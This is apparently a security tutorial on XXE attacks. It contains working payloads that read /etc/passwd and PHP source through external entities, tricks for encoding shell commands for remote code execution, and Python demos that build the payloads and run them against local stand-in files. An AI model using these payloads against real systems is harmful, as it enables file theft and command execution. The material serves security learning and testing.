
XXE

1) Identification

XXE vulnerabilities occur when an application parses XML input from untrusted sources with a parser that resolves external entities. An attacker who controls the XML can declare an entity whose SYSTEM identifier points at a local file and reference it inside the document; the parser then substitutes the file's contents, disclosing sensitive files from the system. The relevant parts of the XML document are the DOCTYPE (where entities are declared) and the element in which the entity is referenced.

2) Local File Disclosure

In this case data is sent to the server inside an XML document, so we can modify it: declare our own entity in a DOCTYPE and reference it (&[entity];) inside an element whose value is reflected in the response, then watch what the reference expands to.


2) Reading sensitive files

Note that in certain Java web applications we may also be able to specify a directory instead of a file; the parser then returns a directory listing, which is useful for locating sensitive files.

/etc/passwd

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

One-liner for use in a request parameter (URL-encoded: spaces as +, and ? = : & ; percent-encoded)

<%3fxml+version%3d"1.0"%3f><!DOCTYPE+root+[<!ENTITY+test+SYSTEM+'file%3a///etc/passwd'>]><root><user>%26test%3b</user></root>
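The following is an added example and not code from the original page: it builds the /etc/passwd payload above (and the URL-encoded one-liner), then feeds it to a parser that does resolve SYSTEM entities, so the file contents show up in the element text, beside the same parser with that feature left off. It uses Python's xml.sax (expat); the file read is a constructed stand-in written to a temp directory, not the real /etc/passwd, and the function and entity names are this example's own.

```python
import io
import os
import tempfile
import urllib.parse
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def xxe_payload(path, root="foo", entity="xxe"):
    """Same shape as the /etc/passwd payload above: an external entity that
    points at a local file, referenced once inside the root element."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        f"<!DOCTYPE {root} [\n"
        f"   <!ELEMENT {root} ANY >\n"
        f'   <!ENTITY {entity} SYSTEM "file://{path}" >]>\n'
        f"<{root}>&{entity};</{root}>"
    )


def xxe_param(path):
    """The one-liner form, URL-encoded for a request parameter. Letters, digits,
    quotes, brackets and / are left as-is; '?', '=', ':', '&' and ';' are
    percent-encoded and spaces become '+'."""
    xml = (
        '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM '
        f"'file://{path}'>]><root><user>&test;</user></root>"
    )
    return urllib.parse.quote_plus(xml, safe="<>!\"'[]/")


class _TextCollector(ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_document(xml_text, resolve_external=False):
    """Parse with xml.sax (expat) and return the document's text content.

    resolve_external=True switches on feature_external_ges, so SYSTEM entities
    are fetched and their contents spliced into the element text: this is the
    vulnerable configuration (and was the default before Python 3.7.1).
    With the feature off, the entity reference expands to nothing."""
    handler = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("latin-1")))
    return "".join(handler.chunks)


def demo(contents=b"root:x:0:0:root:/root:/bin/bash\n"):
    """Constructed stand-in for /etc/passwd in a temp dir (so this runs without
    touching real system files). Returns (vulnerable result, hardened result)."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "passwd")
        with open(target, "wb") as fh:
            fh.write(contents)
        payload = xxe_payload(target)
        leaked = parse_document(payload, resolve_external=True)
        safe = parse_document(payload)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

The hardened call is the same parser with external general entities disabled, which is what current Python defaults to; on a real target the equivalent check is whether the reflected element comes back containing the file or empty.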

Read a custom file

Accessing local files

Blind XXE

XXE with Network Access

3) Read Source Code

Here we need to be careful: the external entity is only expanded if the referenced file is well-formed as XML content, so the attack fails when the file contains characters that XML treats specially (such as < and &), which is the case for most source code. For these files we can have the target base64 encode the content before it is inserted into the document, then decode it on our side.
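Added example, not code from the original page, assuming a PHP target where the php://filter stream wrapper can base64-encode a file before the parser sees it (other platforms need a different mechanism). The reflected element name `name`, the response body and the sample source are all constructed for the demo. It also shows why the raw read fails: the sample source is checked for well-formedness as element content, which is exactly what an expanded entity must satisfy.

```python
import base64
import re
import xml.etree.ElementTree as ET


def source_payload(resource, root="foo", entity="xxe"):
    """Entity that makes a PHP target hand back a file base64-encoded instead
    of raw, so '<', '&' and '?' in the source cannot break the XML.
    Assumption: PHP target with the php://filter wrapper available."""
    uri = f"php://filter/convert.base64-encode/resource={resource}"
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'   <!ENTITY {entity} SYSTEM "{uri}" >]>\n'
        f"<{root}>&{entity};</{root}>"
    )


def is_wellformed_as_content(text):
    """True if `text` could be spliced into an element as-is, i.e. what a raw
    (non-base64) external entity expansion requires."""
    try:
        ET.fromstring(f"<wrap>{text}</wrap>")
        return True
    except ET.ParseError:
        return False


def extract_leak(response_body, tag):
    """Pull the expanded entity out of the element the application reflects
    (tag name supplied by the caller) and decode the base64."""
    m = re.search(rf"<{tag}>([A-Za-z0-9+/=\s]+)</{tag}>", response_body)
    if not m:
        return None
    return base64.b64decode("".join(m.group(1).split())).decode("utf-8", "replace")


def demo():
    """Constructed sample: the 'leaked' source contains <?php, & and quotes,
    which break plain entity expansion; a constructed response echoes its
    base64 form inside <name>...</name>. Returns (decoded, original)."""
    source = '<?php\n$db = mysqli_connect("localhost", "app", "s3cr3t&") or die();\n'
    b64 = base64.b64encode(source.encode()).decode()
    response = f"<html><body>Hello <name>{b64}</name></body></html>"
    return extract_leak(response, "name"), source


if __name__ == "__main__":
    decoded, original = demo()
    print("raw read would parse:", is_wellformed_as_content(original))
    print("base64 read recovered the file:", decoded == original)
```

A plain text file such as /etc/passwd passes the well-formedness check, which is why the earlier payload works without encoding; source files generally do not.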


4) Remote Code Execution

Here we also need to be careful with special characters (| < > { } &): they break either the XML or the command, so encode them where needed. Since a literal space cannot appear in the entity's SYSTEM identifier (it is a URI), replace all spaces in the command with $IFS, which the shell expands back to whitespace when the command runs. Another trick for RCE is to URL encode a newline (\n as %0a) in front of the command.

An example command to test with is %0als (a URL-encoded newline followed by ls).
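Added example, not from the original page, for the two encoding tricks above. How the command is made to execute on the target is not shown here, only how it is encoded; run_as_shell executes the encoded form locally with sh -c to confirm the shell still sees the original arguments. The function names are this example's own.

```python
import subprocess
import urllib.parse


def ifs_encode(command):
    """Replace every space with $IFS. Caveat: the shell reads a variable name
    greedily, so '$IFShello' is the (empty) variable IFShello; when the next
    character could continue a name we emit ${IFS} instead."""
    out = []
    for i, ch in enumerate(command):
        if ch != " ":
            out.append(ch)
            continue
        nxt = command[i + 1] if i + 1 < len(command) else ""
        out.append("${IFS}" if (nxt.isalnum() or nxt == "_") else "$IFS")
    return "".join(out)


def rce_parameter(command):
    """Leading newline, URL-encoded as %0a, followed by the $IFS-encoded
    command; '$' and '/' are kept literal so the shell still sees them."""
    return urllib.parse.quote("\n" + ifs_encode(command), safe="$/")


def run_as_shell(command):
    """Run the encoded command through sh -c, as a target shell would, and
    return its stdout: $IFS expands to whitespace and splits the arguments."""
    result = subprocess.run(
        ["sh", "-c", ifs_encode(command)], capture_output=True, text=True
    )
    return result.stdout


if __name__ == "__main__":
    print(ifs_encode("ls -la"))          # ls$IFS-la
    print(rce_parameter("ls"))           # %0Als
    print(repr(run_as_shell("echo hello world")))
```

The ${IFS} form matters whenever a space is followed by a letter, digit or underscore (for example between "echo" and its arguments); for "ls -la" the plain $IFS shown on this page is enough.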
